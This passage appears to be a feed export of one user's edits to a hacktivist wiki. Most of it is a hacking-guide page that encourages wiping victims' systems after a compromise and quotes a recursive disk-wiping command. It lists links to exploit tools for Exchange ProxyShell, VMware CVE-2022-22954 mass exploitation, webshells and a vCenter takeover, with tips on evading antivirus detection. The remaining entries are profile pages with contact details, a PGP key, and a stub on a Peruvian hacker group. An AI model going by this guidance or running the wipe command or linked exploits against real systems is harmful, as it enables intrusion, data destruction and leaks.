There may be times during a hacktivist operation when you come to the end of your hack, you&#039;ve fully compromised your target, exfiltrated everything you can/want and now before finally leaving the network and leaking all the targets secrets online you want to cause chaos and destruction. [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T As was seen by Guacamaya] where they used &amp;lt;code&amp;gt;sdelete64.exe -accepteula -r -s C:\*&amp;lt;/code&amp;gt; to wipe systems attached to Pronicos domain you might also want to do the same for Linux and Windows systems in your operations, maybe you want to recursively print a text file with your manifesto across a system/network, encrypt files beyond recovery or just delete everything.&lt;br /&gt;
&lt;br /&gt;
See [[Chaos and Destruction]] for different ways to achieve this!&lt;br /&gt;
&lt;br /&gt;
== Hacking Misc ==&lt;br /&gt;
&lt;br /&gt;
=== Web Application Hacking ===&lt;br /&gt;
&lt;br /&gt;
See [[Hacking Web Applications]]&lt;br /&gt;
&lt;br /&gt;
=== API Hacking ===&lt;br /&gt;
Application Programming Interfaces (APIs) are the plumbing of today’s financial services and FinTech infrastructure, enabling FinTechs to embed banking into their apps and banks to offer a more unified experience to their customers demanding more from their bank ([https://web.archive.org/web/20230713230449if_/https://cdn-153.anonfiles.com/a5Q8c02azf/b80f3b8b-1689290042/Scorched-Earth-Whitepaper.pdf Knight]). [https://owasp.org/www-project-api-security APIs can be exploited] to aid in data exfiltration and taking advantage of an existing service.&lt;br /&gt;
&lt;br /&gt;
See [[Hacking APIs]]!&lt;br /&gt;
&lt;br /&gt;
=== IoT Hacking ===&lt;br /&gt;
* https://github.com/V33RU/IoTSecurity101&lt;br /&gt;
&lt;br /&gt;
=== Hacking The Cloud ===&lt;br /&gt;
More and more of corporate networks are moving away from on-prem to in the cloud. Learning how to [https://hackingthe.cloud hack the cloud infrastructure] of your target is a valuable skill and as time progresses more and more networks will migrate towards the cloud.&lt;br /&gt;
&lt;br /&gt;
See [[Cloud Hacking]]&lt;br /&gt;
&lt;br /&gt;
=== Reverse Engineering ===&lt;br /&gt;
As was seen by [https://enlacehacktivista.org/index.php?title=Hack_Back!_A_DIY_Guide Phineas Fisher], highly motivated hacktivists who seek to hack their targets by any means necessary should consider 0-day research and exploit development, reverse engineering applications and services that their target may be running to gain an initial foothold and perform post exploitation.&lt;br /&gt;
&lt;br /&gt;
See [[Reverse Engineering]]&lt;br /&gt;
&lt;br /&gt;
== Product-specific Hacking ==&lt;br /&gt;
&lt;br /&gt;
=== Google Workspace ===&lt;br /&gt;
https://www.slideshare.net/dafthack/ok-google-how-do-i-red-team-gsuite&lt;br /&gt;
&lt;br /&gt;
=== VMware ===&lt;br /&gt;
* Exploiting vCenter to add vSphere user: https://github.com/HynekPetrak/HynekPetrak/blob/master/take_over_vcenter_670.md&lt;br /&gt;
* VMware Workspace ONE Access and Identity Manager RCE via SSTI. [https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis CVE-2022-22954:] Unauthenticated server-side template injection. [https://github.com/tunelko/CVE-2022-22954-PoC Mass Exploit]&lt;br /&gt;
&lt;br /&gt;
=== Rocket.Chat ===&lt;br /&gt;
* Account hijacking and RCE as admin: [https://web.archive.org/web/20210805092939/https://edbrsk.dev/content/real-cases/how-I-compromised-300-stores-and-a-spanish-consultancy https://edbrsk.dev/content/real-cases/how-I-compromised-300-stores-and-a-spanish-consultancy]&lt;br /&gt;
&lt;br /&gt;
=== Microsoft Exchange ===&lt;br /&gt;
&lt;br /&gt;
ProxyLogon is dead. It&#039;s mitigated by Defender. ProxyShell is not. AMSI catches unmodified public exploits.&lt;br /&gt;
&lt;br /&gt;
* ProxyShell:  https://github.com/dmaasland/proxyshell-poc&lt;br /&gt;
* Improved proxyshell-poc: https://github.com/horizon3ai/proxyshell&lt;br /&gt;
* ProxyShell (webshell via New-MailboxExportRequest): https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/http/exchange_proxyshell_rce.md&lt;br /&gt;
* ProxyShell (webshell via New-ExchangeCertificate): https://gist.github.com/dmaasland/0720891aaf6dec8d3b42a5b92c8d6f94&lt;br /&gt;
* Polymorphic webshells: https://github.com/grCod/poly&lt;br /&gt;
* ProxyShell (no webshell, dump mailboxes via PowerShell): https://github.com/Jumbo-WJB/Exchange_SSRF&lt;br /&gt;
* Proxylogon, proxyshell, proxyoracle and proxytoken full chain exploit tool: https://github.com/FDlucifer/Proxy-Attackchain&lt;br /&gt;
* Automatic ProxyShell Exploit: https://github.com/Udyz/proxyshell-auto&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=User:Mxwgn&amp;diff=1691</id>
		<title>User:Mxwgn</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=User:Mxwgn&amp;diff=1691"/>
		<updated>2023-11-16T19:42:31Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt; Hello.&lt;br /&gt;
&lt;br /&gt;
 Contact:&lt;br /&gt;
 FEDIVERSE: @maxwl@mastodon.social&lt;br /&gt;
 XMPP: max@macaw.me&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=User:Mxwgn&amp;diff=1690</id>
		<title>User:Mxwgn</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=User:Mxwgn&amp;diff=1690"/>
		<updated>2023-11-16T19:41:22Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: i&amp;#039;m back.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Hello.&lt;br /&gt;
&lt;br /&gt;
FEDIVERSE: @maxwl@mastodon.social&lt;br /&gt;
XMPP: max@macaw.me&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=User:Mxwgn&amp;diff=1475</id>
		<title>User:Mxwgn</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=User:Mxwgn&amp;diff=1475"/>
		<updated>2023-08-16T23:54:32Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: Replaced content with &amp;quot;&amp;lt;no-data&amp;gt;&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;no-data&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=LulzSecPeru&amp;diff=1008</id>
		<title>LulzSecPeru</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=LulzSecPeru&amp;diff=1008"/>
		<updated>2023-05-06T01:59:28Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: remade page&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;LulzSecPeru is a Team of two Peruvian Hacktivists.&lt;br /&gt;
&lt;br /&gt;
* Associated Press article in [https://apnews.com/article/a116da8dad8b4d9e8034a8556c87dbb0 english] and [https://apnews.com/article/archive-0fa4195c0171497f9090cc76381dc90d spanish]&lt;br /&gt;
* BBC News: https://www.bbc.co.uk/programmes/m0012plm&lt;br /&gt;
* Twitter: https://twitter.com/LulzSecPeru&lt;br /&gt;
* Phys: https://phys.org/news/2014-09-south-america-hackers-rattle-peru.html&lt;br /&gt;
* Quartz: https://qz.com/259444/latin-american-government-cronyism-as-told-through-emails-leaked-by-peruvian-hackers/&lt;br /&gt;
&lt;br /&gt;
[[Category:Stub pages]]&lt;br /&gt;
[[Category:Hackers]]&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=User:Mxwgn&amp;diff=1007</id>
		<title>User:Mxwgn</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=User:Mxwgn&amp;diff=1007"/>
		<updated>2023-05-06T00:54:19Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Hello, i&#039;m maxwell. a brazilian teen representating latin american people.&lt;br /&gt;
if you need to get in touch, write me an e-mail.&lt;br /&gt;
&lt;br /&gt;
 maxwell@disroot.org&lt;br /&gt;
my PGP key for encrypted messages --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;-----BEGIN PGP PUBLIC KEY BLOCK-----&lt;br /&gt;
&lt;br /&gt;
xsDNBGRUlO8BDADCsmxWF0pVWlTISHBGosjSLf1ttRuwGUw9wbV8QNhJnic+civH&lt;br /&gt;
5Yv8wMfUQ6AXmsPAxinf9XjbQhA6zIqBUXiulVu24+iULx9frpGBogUzz1UtKADa&lt;br /&gt;
ij3IYMqEIGJiSUF/8Pi5en+A9IREph4fQliZUdXLDdVNEkyEAys43Bn9eCn/1H4C&lt;br /&gt;
RfwORCaM1ThXyV5dAAV5BOZNoBVzCO63WPpXdNKS4FIxPIAjYI4lIj9XG3NOUCw1&lt;br /&gt;
lXDL3SlBuc9rfPtn6cjh0O0MNC+TaU1XTwWFWZQXR/qLQKhjqyTVL4kdREkizIfC&lt;br /&gt;
siDzvgkpogeuWNcRajkV0ycBEr+5Qc2Tu71PS4kubzLmXdXdqcLjtctl/0s6cxC8&lt;br /&gt;
3nAx0O3JPhZ+sulPi+Dq/NleZJtznv0mDAmfL4UWJiwhlYb5HjSLOr50yRcvVMTr&lt;br /&gt;
kaYBaoU9zKgVxHlV3DJPC+IRDe4TjTp0RojPk0wSiAhViDOiB8SxKl+yy6Dyz45V&lt;br /&gt;
HqGA6u8tvvDGbCUAEQEAAc0dbWF4d2VsbCA8bWF4d2VsbEBkaXNyb290Lm9yZz7C&lt;br /&gt;
wQ0EEwEIADcWIQS0aN9pMNPmSF3bTmtVJAGLQ7HgpAUCZFSU8AUJEswDAAIbAwQL&lt;br /&gt;
CQgHBRUICQoLBRYCAwEAAAoJEFUkAYtDseCkaVcL/iLe8RV+dL9Z04r7yP53KbA8&lt;br /&gt;
hJy8U+SdLK9RrNJASuQ9Il4ZjXJnY02AcZl4szr5XxWwOQvJV0iwE8wO69I3MF1S&lt;br /&gt;
EzcjOVn1X36aK21vTrIZHXjVF6rVfV7op4ZHdA4OEdFYYe+C51Xe6jBhA3IMZRan&lt;br /&gt;
nuUsCGrpoad/O7FjHYpuaikzLMOxFhCFuEYHmEotYRKRN0xVoYWg/dX5EZL72XmV&lt;br /&gt;
CPqSvkw30WaK8P47dmlJPIFGAwP5nyNlBtBJTNS+ToK1Mitpt4e7EEGdGotIVCVL&lt;br /&gt;
zzkgA5fIREtkLB7LJs+RQ7N4A43GHDQx8Q9h3LBgpmW5vrjlKdei+Dwyd1LdDV8q&lt;br /&gt;
0kpgS7vSphUoxDi3EmvDOqTSjc8QA0Y9Igy8xCJDZ+Uvj1JayvnYyk2/5UgsJl8D&lt;br /&gt;
W/d8VoSgTyZxEDRg5E+MTuAQ7OalYWtQtDaQY1Ddgefqnzx5cqF6zLry/jG7jhJp&lt;br /&gt;
xgWbo8aohFevr0NgqU9l58FWmK9Tr5PHpxjb7HaEOs7AzQRkVJTwAQwA5CpI8o0s&lt;br /&gt;
xIeNKv5HsEmc2wpYAP7Pu+MsuxhpRhKGLpq66jSPgIM9hzoT5zVviLy0aLtW8Ol/&lt;br /&gt;
zAMDpY+zHtpe0gjScnDVrKZDRwd6qzO58pXfEovfrfRBiX8/lNVORqJ5lwyi1IYP&lt;br /&gt;
ANTyFO3QNYqw7LGwo9AagSdJOSIHnNJw4r1IAZkY9OxQROfqxf1B5S4ABDPdIYu3&lt;br /&gt;
z1RFQCI9cppz0kgzK8omSCrSG1vnH8a/eqiJtqmq9P/Db6U3hnaWZGXOtwhGhr9C&lt;br /&gt;
P3BH1TL7DwdrQ3eMj4B9MWVmPwpv4WNRXYMbplEFgdsF3tsNuB5NG+QDx3CsIszo&lt;br /&gt;
eqsfX50ZrmLYx6U4oZJYi4XVUoXCjDTetjaBcCiyb+F19ARJSXemEQOgk7QhdwGp&lt;br /&gt;
L29+vN9SH9S+MIKU8Z2dZFrtkNn9GhWOrevkrfzHF2d5m6Z9klnSLG26qOghKrM/&lt;br /&gt;
xmjvDF+a0m9LZ6YozBsc/0CbnYXHnJOl6ikQv+2NUdyyt1Tymp/E1s6PABEBAAHC&lt;br /&gt;
wPwEGAEIACYWIQS0aN9pMNPmSF3bTmtVJAGLQ7HgpAUCZFSU8gUJEswDAAIbDAAK&lt;br /&gt;
CRBVJAGLQ7HgpHNxC/9AmMg/hr/Do54vzCu8UhDBWLVChjNzYc7yy5XJw3+uXTf+&lt;br /&gt;
hOS7VjZuXXYeFh1RoldjQSnEDduWcgH/18znzChs7FiAvWq4sMd2ygJ9pNIBjz4W&lt;br /&gt;
WZPowqZ+0vLIMWlqfWLowk1NJRiOOAS+HApM/gdqtgGtZkHjnEm+D93Xuje8TLGN&lt;br /&gt;
z3sJVMaqOCldDywZjq5iLAAh2uUdDNdgE8BKH6EodTiDkKCcdm2vNfdF51wec8cJ&lt;br /&gt;
Zox2VCckeAae3q3SzdZ45c5MdJo7SLwnNhV/TqVAoalcXe1WYDOQDdMGD4oz2aUZ&lt;br /&gt;
OlS3OynCaHVsNVRTqeiamrUhnSA5j50IqrOuEVnRuRlO4Cg3pxTJZiz++tc/Tc9g&lt;br /&gt;
vbQ2tkt+tUxF9AS+R3h/6Fv/KW+2c2lwF0vKY6NZ8r63BzPKM9t7EOrlAa1pt1Mv&lt;br /&gt;
SE978iuv8fBdW99JRWeCw0aUJLdmDQuNvTJTj93XO9cogxspq09NnGAnePf3yfqi&lt;br /&gt;
sd9TDUR9uRxdjtpAbxw=&lt;br /&gt;
=yYrX&lt;br /&gt;
-----END PGP PUBLIC KEY BLOCK-----&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
Ⓐ&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=User:Mxwgn&amp;diff=1006</id>
		<title>User:Mxwgn</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=User:Mxwgn&amp;diff=1006"/>
		<updated>2023-05-06T00:53:02Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: Creating my user page on the wiki for the first time.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Hello, i&#039;m maxwell. a brazilian teen representating latin american people.&lt;br /&gt;
if you need to get in touch, write me an e-mail.&lt;br /&gt;
&lt;br /&gt;
 maxwell@disroot.org&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;-----BEGIN PGP PUBLIC KEY BLOCK-----&lt;br /&gt;
&lt;br /&gt;
xsDNBGRUlO8BDADCsmxWF0pVWlTISHBGosjSLf1ttRuwGUw9wbV8QNhJnic+civH&lt;br /&gt;
5Yv8wMfUQ6AXmsPAxinf9XjbQhA6zIqBUXiulVu24+iULx9frpGBogUzz1UtKADa&lt;br /&gt;
ij3IYMqEIGJiSUF/8Pi5en+A9IREph4fQliZUdXLDdVNEkyEAys43Bn9eCn/1H4C&lt;br /&gt;
RfwORCaM1ThXyV5dAAV5BOZNoBVzCO63WPpXdNKS4FIxPIAjYI4lIj9XG3NOUCw1&lt;br /&gt;
lXDL3SlBuc9rfPtn6cjh0O0MNC+TaU1XTwWFWZQXR/qLQKhjqyTVL4kdREkizIfC&lt;br /&gt;
siDzvgkpogeuWNcRajkV0ycBEr+5Qc2Tu71PS4kubzLmXdXdqcLjtctl/0s6cxC8&lt;br /&gt;
3nAx0O3JPhZ+sulPi+Dq/NleZJtznv0mDAmfL4UWJiwhlYb5HjSLOr50yRcvVMTr&lt;br /&gt;
kaYBaoU9zKgVxHlV3DJPC+IRDe4TjTp0RojPk0wSiAhViDOiB8SxKl+yy6Dyz45V&lt;br /&gt;
HqGA6u8tvvDGbCUAEQEAAc0dbWF4d2VsbCA8bWF4d2VsbEBkaXNyb290Lm9yZz7C&lt;br /&gt;
wQ0EEwEIADcWIQS0aN9pMNPmSF3bTmtVJAGLQ7HgpAUCZFSU8AUJEswDAAIbAwQL&lt;br /&gt;
CQgHBRUICQoLBRYCAwEAAAoJEFUkAYtDseCkaVcL/iLe8RV+dL9Z04r7yP53KbA8&lt;br /&gt;
hJy8U+SdLK9RrNJASuQ9Il4ZjXJnY02AcZl4szr5XxWwOQvJV0iwE8wO69I3MF1S&lt;br /&gt;
EzcjOVn1X36aK21vTrIZHXjVF6rVfV7op4ZHdA4OEdFYYe+C51Xe6jBhA3IMZRan&lt;br /&gt;
nuUsCGrpoad/O7FjHYpuaikzLMOxFhCFuEYHmEotYRKRN0xVoYWg/dX5EZL72XmV&lt;br /&gt;
CPqSvkw30WaK8P47dmlJPIFGAwP5nyNlBtBJTNS+ToK1Mitpt4e7EEGdGotIVCVL&lt;br /&gt;
zzkgA5fIREtkLB7LJs+RQ7N4A43GHDQx8Q9h3LBgpmW5vrjlKdei+Dwyd1LdDV8q&lt;br /&gt;
0kpgS7vSphUoxDi3EmvDOqTSjc8QA0Y9Igy8xCJDZ+Uvj1JayvnYyk2/5UgsJl8D&lt;br /&gt;
W/d8VoSgTyZxEDRg5E+MTuAQ7OalYWtQtDaQY1Ddgefqnzx5cqF6zLry/jG7jhJp&lt;br /&gt;
xgWbo8aohFevr0NgqU9l58FWmK9Tr5PHpxjb7HaEOs7AzQRkVJTwAQwA5CpI8o0s&lt;br /&gt;
xIeNKv5HsEmc2wpYAP7Pu+MsuxhpRhKGLpq66jSPgIM9hzoT5zVviLy0aLtW8Ol/&lt;br /&gt;
zAMDpY+zHtpe0gjScnDVrKZDRwd6qzO58pXfEovfrfRBiX8/lNVORqJ5lwyi1IYP&lt;br /&gt;
ANTyFO3QNYqw7LGwo9AagSdJOSIHnNJw4r1IAZkY9OxQROfqxf1B5S4ABDPdIYu3&lt;br /&gt;
z1RFQCI9cppz0kgzK8omSCrSG1vnH8a/eqiJtqmq9P/Db6U3hnaWZGXOtwhGhr9C&lt;br /&gt;
P3BH1TL7DwdrQ3eMj4B9MWVmPwpv4WNRXYMbplEFgdsF3tsNuB5NG+QDx3CsIszo&lt;br /&gt;
eqsfX50ZrmLYx6U4oZJYi4XVUoXCjDTetjaBcCiyb+F19ARJSXemEQOgk7QhdwGp&lt;br /&gt;
L29+vN9SH9S+MIKU8Z2dZFrtkNn9GhWOrevkrfzHF2d5m6Z9klnSLG26qOghKrM/&lt;br /&gt;
xmjvDF+a0m9LZ6YozBsc/0CbnYXHnJOl6ikQv+2NUdyyt1Tymp/E1s6PABEBAAHC&lt;br /&gt;
wPwEGAEIACYWIQS0aN9pMNPmSF3bTmtVJAGLQ7HgpAUCZFSU8gUJEswDAAIbDAAK&lt;br /&gt;
CRBVJAGLQ7HgpHNxC/9AmMg/hr/Do54vzCu8UhDBWLVChjNzYc7yy5XJw3+uXTf+&lt;br /&gt;
hOS7VjZuXXYeFh1RoldjQSnEDduWcgH/18znzChs7FiAvWq4sMd2ygJ9pNIBjz4W&lt;br /&gt;
WZPowqZ+0vLIMWlqfWLowk1NJRiOOAS+HApM/gdqtgGtZkHjnEm+D93Xuje8TLGN&lt;br /&gt;
z3sJVMaqOCldDywZjq5iLAAh2uUdDNdgE8BKH6EodTiDkKCcdm2vNfdF51wec8cJ&lt;br /&gt;
Zox2VCckeAae3q3SzdZ45c5MdJo7SLwnNhV/TqVAoalcXe1WYDOQDdMGD4oz2aUZ&lt;br /&gt;
OlS3OynCaHVsNVRTqeiamrUhnSA5j50IqrOuEVnRuRlO4Cg3pxTJZiz++tc/Tc9g&lt;br /&gt;
vbQ2tkt+tUxF9AS+R3h/6Fv/KW+2c2lwF0vKY6NZ8r63BzPKM9t7EOrlAa1pt1Mv&lt;br /&gt;
SE978iuv8fBdW99JRWeCw0aUJLdmDQuNvTJTj93XO9cogxspq09NnGAnePf3yfqi&lt;br /&gt;
sd9TDUR9uRxdjtpAbxw=&lt;br /&gt;
=yYrX&lt;br /&gt;
-----END PGP PUBLIC KEY BLOCK-----&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
Ⓐ&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
</feed>